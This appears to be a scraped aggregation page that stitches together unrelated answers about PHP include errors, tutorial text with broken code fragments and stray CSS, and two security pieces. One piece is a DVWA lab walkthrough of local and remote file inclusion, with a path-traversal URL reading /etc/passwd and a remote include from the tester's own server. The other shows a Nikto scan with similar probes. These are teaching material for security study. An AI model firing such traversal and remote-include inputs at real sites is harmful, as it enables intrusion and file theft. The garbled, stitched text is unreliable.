Главная » Языки программирования

PHP include Example

Содержание
  1. PHP Warning: include_once() Failed opening » for inclusion (include_path=’.;C:\xampp\php\PEAR’)
  2. Answer by Tatum Underwood
  3. Answer by Titus Winters
  4. Answer by Madison Yates
  5. Answer by Peter Brooks
  6. Answer by Jose Patton
  7. Answer by Gia Jacobson

PHP Warning: include_once() Failed opening » for inclusion (include_path=’.;C:\xampp\php\PEAR’)

I know this error is very common, I’ve tried to search google, I did the tricks to no avail. So my setup is, I have 3 directories: , it’s giving me this: Failed opening ‘C:\xampp\htdocs\metro\pages\../initcontrols/header_myworks.php’ for inclusion (include_path=’.;C:\xampp\php\PEAR’) – user1410081 Dec 10 ’12 at 11:48 ,*Warning: require_once(initcontrols/config.php) [function.require-once]: failed to open stream: No such file or directory in*,The directory of the file. If used inside an include, the directory of the included file is returned

This should work if current file is located in same directory where initcontrols is:

initcontrolsconfig.php"); ?> 
initcontrolsheader_myworks.php"; include_once($file); echo $plHeader;?>

Answer by Tatum Underwood

See the include_once documentation for information about the _once behaviour, and how it differs from its non _once siblings. , The require_once expression is identical to require except PHP will check if the file has already been included, and if so, not include (require) it again. , require_​once , include_​once

The require_once expression is identical to require except PHP will check if the file has already been included, and if so, not include (require) it again.

Answer by Titus Winters

Now that we understand how a file inclusion vulnerability can occur, we will exploit the vulnerabilities on the include.php page.,Remote File Inclusion (RFI) and Local File Inclusion (LFI) are vulnerabilities that are often found in poorly-written web applications. These vulnerabilities occur when a web application allows the user to submit input into files or upload files to the server.,RFI vulnerabilities are easier to exploit but less common. Instead of accessing a file on the local machine, the attacker is able to execute code hosted on their own machine.,In order to demonstrate these techniques, we will be using the Damn Vulnerable Web Application (DVWA) within metasploitable. Connect to metasploitable from your browser and click on the DVWA link.

Читайте также:  Создание компилятора на python

On the file inclusion page, click on the view source button on the bottom right. If your security setting is successfully set to low, you should see the following source code:

$file = $_GET['page']; //The page we wish to display

We can use cat to view the index.php within the /var/www/dvwa/vulnerabilities/fi/ directory.

msfadmin: cat -n /var/www/dvwa/vulnerabilities/fi/index.php

Looking at the output, we can see that there is a switch statement on line 15, which takes the security setting as input and breaks depending on which setting is applied. Since we have selected ‘low’, the code proceeds to call /source/low.php. If we look farther down in index.php, we can see that line 35 says:

In the browser address bar, enter the following:

http://192.168.80.134/dvwa/vulnerabilities/fi/?page=../../../../../../etc/passwd

In metasploitable, we can open the php.ini file using nano :

msfadmin: sudo nano /etc/php5/cgi/php.ini sudo password: msfadmin

In nano, type ‘ctrl-w’ to find a string. Type in ‘allow_url’ and hit enter. We should now be on line 573 of the php.ini file (type ‘ctrl-c’ to find the current line in nano). Make sure that ‘allow_url_fopen’ and ‘allow_url_include’ are both set to ‘On’. Save your file with ‘ctrl-o’, and exit with ‘ctrl-x’. Now, restart metasploitable’s web server with:

msfadmin: sudo /etc/init.d/apache2 restart

In Kali, we need to set up our own web server for testing. First, create a test file called rfi-test.php and then start apache.

[email protected]:~# echo "Success." > /var/www/html/rfi-test.php [email protected]:~# systemctl start apache2

Now we can test our RFI. On the ‘File Inclusion’ page, type the following URL:

http://192.168.80.134/dvwa/vulnerabilities/fi/?page=http://192.168.80.128/rfi-test.php

Answer by Madison Yates

When loading the functions.php file, PHP first looks for the functions.php file in the directory specified by the include_path. In this example, it’s ‘\xampp\php\PEAR’. If PHP can find the functions.php file there, it loads the code from the file.,This demonstrated that the include construct does make PHP executes code in the functions.php file.,The footer.php file contains the code related to the footer of the page:,Read a File into a String: file_get_contents()

The include construct allows you to load the code from another file into a file. Here’s the syntax of the include construct:

.wp-block-code < border: 0; padding: 0; >.wp-block-code > div < overflow: auto; >.shcb-language < border: 0; clip: rect(1px, 1px, 1px, 1px); -webkit-clip-path: inset(50%); clip-path: inset(50%); height: 1px; margin: -1px; overflow: hidden; padding: 0; position: absolute; width: 1px; word-wrap: normal; word-break: normal; >.hljs < box-sizing: border-box; >.hljs.shcb-code-table < display: table; width: 100%; >.hljs.shcb-code-table > .shcb-loc < color: inherit; display: table-row; width: 100%; >.hljs.shcb-code-table .shcb-loc > span < display: table-cell; >.wp-block-code code.hljs:not(.shcb-wrap-lines) < white-space: pre; >.wp-block-code code.hljs.shcb-wrap-lines < white-space: pre-wrap; >.hljs.shcb-line-numbers < border-spacing: 0; counter-reset: line; >.hljs.shcb-line-numbers > .shcb-loc < counter-increment: line; >.hljs.shcb-line-numbers .shcb-loc > span < padding-left: 0.75em; >.hljs.shcb-line-numbers .shcb-loc::before < border-right: 1px solid #ddd; content: counter(line); display: table-cell; padding: 0 0.75em; text-align: right; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none; white-space: nowrap; width: 1%; >include 'path_to_file';Code language: PHP (php)

In this syntax, you place the path to the file after the include keyword. For example, to load the code from the functions.php file into the index.php file, you can use the following include statement:

If PHP cannot find the ‘functions.php’ file in the src directory, it’ll issue a warning. For example:

Warning: include(functions.php): failed to open stream: No such file or directory in . on line 4 Warning: include(): Failed opening 'functions.php' for inclusion (include_path='\xampp\php\PEAR') in . on line 4Code language: PHP (php)

When PHP loads the functions.php file, it actually executes the code inside the functions.php file. For example, if you place the following code in the functions.php file:

 echo get_copyright(); Code language: HTML, XML (xml)

and include the functions.php in the index.php file, you’ll see the following output when you run the index.php file:

Copyright © 2021 by phptutorial.net. All Rights Reserved!Code language: CSS (css)

Typically, you place the template files like header.php and footer.php in a separate directory. By convention, the name of the include directory is inc :

. ├── index.php ├── functions.php ├── inc │ ├── footer.php │ └── header.php └── public ├── css │ └── style.css └── js └── app.jsCode language: CSS (css)

The header.php file contains the code of the header of the page. It has a link to the style.css file located in the public/css directory:

        Code language: HTML, XML (xml)

The footer.php file contains the code related to the footer of the page:

  Code language: HTML, XML (xml)

In the index.php file, you can include the header.php and footer.php file like this:

 
PHP include
 
This shows how the PHP include construct works.
 Code language: HTML, XML (xml)

If you run the index.php file and view the source code of the page, you’ll also see the code from the header.php and footer.php files:

        
PHP include
 
This shows how the PHP include construct works.
   Code language: HTML, XML (xml)

For example, the following defines the $title and $content variables in the functions.php :

When you include the functions.php in the index.php file, the $title and $content variables become the global variables in the index.php file. And you can use them as follows:

    
Code language: HTML, XML (xml)

However, if you include a file in a function, the variables from the included file are local to that function. See the following example:

   
$title
 $content
"; > echo render_article(); ?> Code language: HTML, XML (xml)

Answer by Peter Brooks

Warning: require(/home/selfsbsr/public_html/pulse/wp-includes/post.php): failed to open stream: Permission denied in /home/selfsbsr/public_html/pulse/wp-settings.php on line 166,In each instance, failed to open stream phrase would be followed by a reason. For example, permission denied, no such file or directory, operation failed, and more. ,Having said that, let’s take a look at how to troubleshoot and fix ‘failed to open stream’ error in WordPress. ,Now if your error message contains ‘no such file or directory’, then you need to look in the code to figure out which file is mentioned at that particular line.

Typically, this message would look something like this:

Warning: require(/home/website/wp-includes/load.php): failed to open stream: No such file or directory in /home/website/wp-settings.php on line 19 Fatal error: require(): Failed opening required ‘/home/website/wp-includes/load.php’ (include_path=’.:/usr/share/php/:/usr/share/php5/’) in /home/website/wp-settings.php on line 19 
Last Error: 2018-04-04 14:52:13: (2) HTTP Error: Unable to connect: ‘fopen(compress.zlib://https://www.googleapis.com/analytics/v3/management/accounts/~all/webproperties/~all/profiles?start-index=1): failed to open stream: operation failed’

Answer by Jose Patton

And line 5 contains: require_once __DIR__ . ‘/composer/autoload_real.php’;,@aaronbushnell Can you try running composer dump-autoload?,What environment is this running under? Those paths (e.g., //composer/autoload_real.php) are a bit wonky. Is this a docker container? Window? WSL?,Warning: require(/var/www/html/LaravelTest/vendor/autoload.php): failed to open stream: Permission denied in /var/www/html/LaravelTest/index.php on line 24

Warning: require_once(//composer/autoload_real.php): failed to open stream: No such file or directory in /autoload.php on line 5 Fatal error: require_once(): Failed opening required '//composer/autoload_real.php' (include_path='.:/opt/sp/php7.3/lib/php') in /autoload.php on line 5

Answer by Gia Jacobson

Detection and exploitation of PHP include vulnerabilities: in this part, you will learn how PHP include vulnerabilities work and how to exploit one to gain code execution.,These modifications will modified the detection and exploitation of this issue. ,This course details the discovery and the exploitation of PHP include vulnerabilities in a limited environment. Then it introduces the basics of post exploitation: shell, reverse-shell and TCP redirection.,if the PHP configuration allows remote file include;

A lot of information can be retrieve by connecting to the web application using netcat or telnet:

By sending the following HTTP request:

GET / HTTP/1.1 Host: vulnerable

It’s possible to retrieve information on the version of PHP and the web server used just by observing the HTTP headers sent back by the server:

HTTP/1.1 200 OK Date: Tue, 10 Apr 2012 04:24:16 GMT Server: Apache/2.2.16 (Debian) X-Powered-By: PHP/5.3.2 Vary: Accept-Encoding Content-Length: 2065 Content-Type: text/html

Here the application is available over HTTP. If the application was only available over HTTPs, telnet or netcat would not be able to communicate with the server, the tool openssl can be used:

$ openssl s_client -connect vulnerable:443

The following command line can be executed to scan the remote server:

$ perl nikto.pl -h http://vulnerable/ - Nikto v2.1.4 --------------------------------------------------------------------------- + Target IP: 192.168.0.21 + Target Hostname: vulnerable + Target Port: 80 + Start Time: 2012-04-11 14:12:45 --------------------------------------------------------------------------- + Server: Apache/2.2.16 (Debian) + Retrieved x-powered-by header: PHP/5.3.2 + Apache/2.2.16 appears to be outdated (current is at least Apache/2.2.17). Apache 1.3.42 (final release) and 2.0.64 are also current. + DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details. + /index.php?page=../../../../../../../../../../etc/passwd: PHP include error may indicate local or remote file inclusion is possible. + /index.php?page=../../../../../../../../../../boot.ini: PHP include error may indicate local or remote file inclusion is possible. + OSVDB-3126: /submit?setoption=q&option=allowed_ips&value=255.255.255.255: MLdonkey 2.x allows administrative interface access to be access from any IP. This is typically only found on port 4080. + OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings. + OSVDB-3092: /login/: This might be interesting. + OSVDB-3268: /icons/: Directory indexing found. + OSVDB-3268: /images/: Directory indexing found. + OSVDB-3268: /images/?pattern=/etc/*&sort=name: Directory indexing found. + OSVDB-3233: /icons/README: Apache default file found. + /login.php: Admin login page/section found. + 4103 items checked: 0 error(s) and 13 item(s) reported on remote host + End Time: 2012-04-11 14:13:01 (16 seconds) --------------------------------------------------------------------------- + 1 host(s) tested

Источник

Оцените статью